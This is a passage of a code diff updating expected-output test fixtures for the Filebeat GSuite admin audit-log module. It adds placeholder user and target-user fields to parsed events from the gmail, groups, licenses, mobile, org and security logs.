"event.action": "REMOVE_APPLICATION_FROM_WHITELIST", @@ -3367,7 +3571,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_RENEW_DOMAIN_REGISTRATION", @@ -3417,7 +3624,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_RESELLER_ACCESS", @@ -3466,7 +3676,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "RULE_ACTIONS_CHANGED", @@ -3514,7 +3727,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_RULE", @@ -3562,7 +3778,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_RULE_CRITERIA", @@ -3610,7 +3829,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_RULE", @@ -3658,7 +3880,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "RENAME_RULE", @@ -3707,7 +3932,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "RULE_STATUS_CHANGED", @@ -3757,7 +3985,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_SECONDARY_DOMAIN", @@ -3806,7 +4037,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_SECONDARY_DOMAIN", @@ -3855,7 +4089,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "SKIP_SECONDARY_DOMAIN_MX", @@ -3904,7 +4141,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "VERIFY_SECONDARY_DOMAIN_MX", @@ -3953,7 +4193,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "VERIFY_SECONDARY_DOMAIN", @@ -4002,7 +4245,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_DOMAIN_SECONDARY_EMAIL", @@ -4052,7 +4298,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_SSO_SETTINGS", @@ -4101,7 +4350,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "GENERATE_PIN", @@ -4148,7 +4400,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_RULE", @@ -4196,6 +4451,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-gmail-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-gmail-test.json.log-expected.json index 1db80ed600bd..ab2ea5b15fa0 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-gmail-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-gmail-test.json.log-expected.json @@ -46,7 +46,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "EMAIL_LOG_SEARCH", @@ -100,7 +103,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "EMAIL_UNDELETE", @@ -152,7 +158,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_EMAIL_SETTING", @@ -208,7 +220,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_GMAIL_SETTING", @@ -260,7 +275,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_GMAIL_SETTING", @@ -312,7 +330,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_GMAIL_SETTING", @@ -364,7 +385,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REJECT_FROM_QUARANTINE", @@ -413,7 +437,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "RELEASE_FROM_QUARANTINE", @@ -462,6 +489,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-groups-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-groups-test.json.log-expected.json index ff894cd6c054..b8d461675313 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-groups-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-groups-test.json.log-expected.json @@ -48,7 +48,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DELETE_GROUP", @@ -99,7 +102,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_GROUP_DESCRIPTION", @@ -150,7 +156,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "GROUP_LIST_DOWNLOAD", @@ -198,7 +207,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_GROUP_MEMBER", @@ -251,7 +263,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "REMOVE_GROUP_MEMBER", @@ -304,7 +324,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "UPDATE_GROUP_MEMBER", @@ -359,7 +387,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS", @@ -414,7 +450,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE", @@ -469,7 +513,15 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.group.domain": "example.com", + "user.target.group.name": "group", + "user.target.name": "user" }, { "event.action": "GROUP_MEMBER_BULK_UPLOAD", @@ -519,7 +571,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "GROUP_MEMBERS_DOWNLOAD", @@ -567,7 +622,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_GROUP_NAME", @@ -619,7 +677,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_GROUP_SETTING", @@ -673,7 +734,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "WHITELISTED_GROUPS_UPDATED", @@ -726,6 +790,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-licenses-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-licenses-test.json.log-expected.json index 1fd3a0da6e23..2f36dd24262d 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-licenses-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-licenses-test.json.log-expected.json @@ -47,7 +47,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ORG_ALL_USERS_LICENSE_ASSIGNMENT", @@ -97,7 +100,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "USER_LICENSE_ASSIGNMENT", @@ -148,7 +154,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_LICENSE_AUTO_ASSIGN", @@ -198,7 +210,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "USER_LICENSE_REASSIGNMENT", @@ -250,7 +265,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "ORG_LICENSE_REVOKE", @@ -300,7 +321,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "USER_LICENSE_REVOKE", @@ -351,7 +375,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "UPDATE_DYNAMIC_LICENSE", @@ -402,6 +432,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-mobile-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-mobile-test.json.log-expected.json index 10f080230c41..7b41064d5a89 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-mobile-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-mobile-test.json.log-expected.json @@ -51,7 +51,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "ACTION_REQUESTED", @@ -105,7 +111,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "ADD_MOBILE_CERTIFICATE", @@ -155,7 +167,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "COMPANY_DEVICES_BULK_CREATION", @@ -203,7 +218,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "COMPANY_OWNED_DEVICE_BLOCKED", @@ -252,7 +270,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "COMPANY_DEVICE_DELETION", @@ -301,7 +322,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "COMPANY_OWNED_DEVICE_UNBLOCKED", @@ -350,7 +374,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "COMPANY_OWNED_DEVICE_WIPED", @@ -399,7 +426,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT", @@ -453,7 +483,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER", @@ -502,7 +535,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_MOBILE_APPLICATION_FROM_WHITELIST", @@ -553,7 +589,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_MOBILE_APPLICATION_SETTINGS", @@ -608,7 +647,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_MOBILE_APPLICATION_TO_WHITELIST", @@ -659,7 +701,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "MOBILE_DEVICE_APPROVE", @@ -711,7 +756,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "MOBILE_DEVICE_BLOCK", @@ -763,7 +814,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "MOBILE_DEVICE_DELETE", @@ -815,7 +872,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "MOBILE_DEVICE_WIPE", @@ -867,7 +930,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "CHANGE_MOBILE_SETTING", @@ -920,7 +989,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_ADMIN_RESTRICTIONS_PIN", @@ -969,7 +1041,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_MOBILE_WIRELESS_NETWORK", @@ -1019,7 +1094,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_MOBILE_WIRELESS_NETWORK", @@ -1069,7 +1147,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_MOBILE_WIRELESS_NETWORK", @@ -1119,7 +1200,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD", @@ -1169,7 +1253,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_MOBILE_CERTIFICATE", @@ -1219,7 +1306,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT", @@ -1266,7 +1356,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "USE_GOOGLE_MOBILE_MANAGEMENT", @@ -1313,7 +1406,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS", @@ -1360,7 +1456,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS", @@ -1407,7 +1506,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "MOBILE_ACCOUNT_WIPE", @@ -1459,7 +1561,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE", @@ -1511,7 +1619,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "event.action": "MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK", @@ -1563,6 +1677,12 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-org-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-org-test.json.log-expected.json index b4cdd02f0bde..854d75f96fdf 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-org-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-org-test.json.log-expected.json @@ -47,7 +47,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHROME_APPLICATION_LICENSE_RESERVATION_CREATED", @@ -98,7 +101,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHROME_APPLICATION_LICENSE_RESERVATION_DELETED", @@ -148,7 +154,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED", @@ -200,7 +209,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_DEVICE_ENROLLMENT_TOKEN", @@ -248,7 +260,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ASSIGN_CUSTOM_LOGO", @@ -296,7 +311,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UNASSIGN_CUSTOM_LOGO", @@ -344,7 +362,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_ENROLLMENT_TOKEN", @@ -392,7 +413,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REVOKE_ENROLLMENT_TOKEN", @@ -440,7 +464,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHROME_LICENSES_ALLOWED", @@ -490,7 +517,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CREATE_ORG_UNIT", @@ -538,7 +568,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_ORG_UNIT", @@ -586,7 +619,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "EDIT_ORG_UNIT_DESCRIPTION", @@ -634,7 +670,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "MOVE_ORG_UNIT", @@ -683,7 +722,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "EDIT_ORG_UNIT_NAME", @@ -732,7 +774,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REVOKE_DEVICE_ENROLLMENT_TOKEN", @@ -780,7 +825,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_SERVICE_ENABLED", @@ -834,6 +882,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-security-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-security-test.json.log-expected.json index d08d68f872e1..609025f91377 100644 --- a/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-security-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/admin/test/gsuite-admin-security-test.json.log-expected.json @@ -48,7 +48,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ALLOW_SERVICE_FOR_OAUTH2_ACCESS", @@ -98,7 +101,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "DISALLOW_SERVICE_FOR_OAUTH2_ACCESS", @@ -148,7 +154,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID", @@ -201,7 +210,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ADD_TO_TRUSTED_OAUTH2_APPS", @@ -252,7 +264,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "REMOVE_FROM_TRUSTED_OAUTH2_APPS", @@ -303,7 +318,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "BLOCK_ON_DEVICE_ACCESS", @@ -352,7 +370,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION", @@ -406,7 +427,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_TWO_STEP_VERIFICATION_FREQUENCY", @@ -460,7 +484,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION", @@ -514,7 +541,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_TWO_STEP_VERIFICATION_START_DATE", @@ -568,7 +598,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS", @@ -621,7 +654,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TOGGLE_CAA_ENABLEMENT", @@ -669,7 +705,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CAA_ERROR_MESSAGE", @@ -718,7 +757,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "CHANGE_CAA_APP_ASSIGNMENTS", @@ -770,7 +812,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UNTRUST_DOMAIN_OWNED_OAUTH2_APPS", @@ -818,7 +863,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "TRUST_DOMAIN_OWNED_OAUTH2_APPS", @@ -866,7 +914,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY", @@ -920,7 +971,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "ENFORCE_STRONG_AUTHENTICATION", @@ -976,7 +1030,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS", @@ -1027,7 +1084,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED", @@ -1081,7 +1141,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "event.action": "SESSION_CONTROL_SETTINGS_CHANGE", @@ -1133,7 +1196,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": 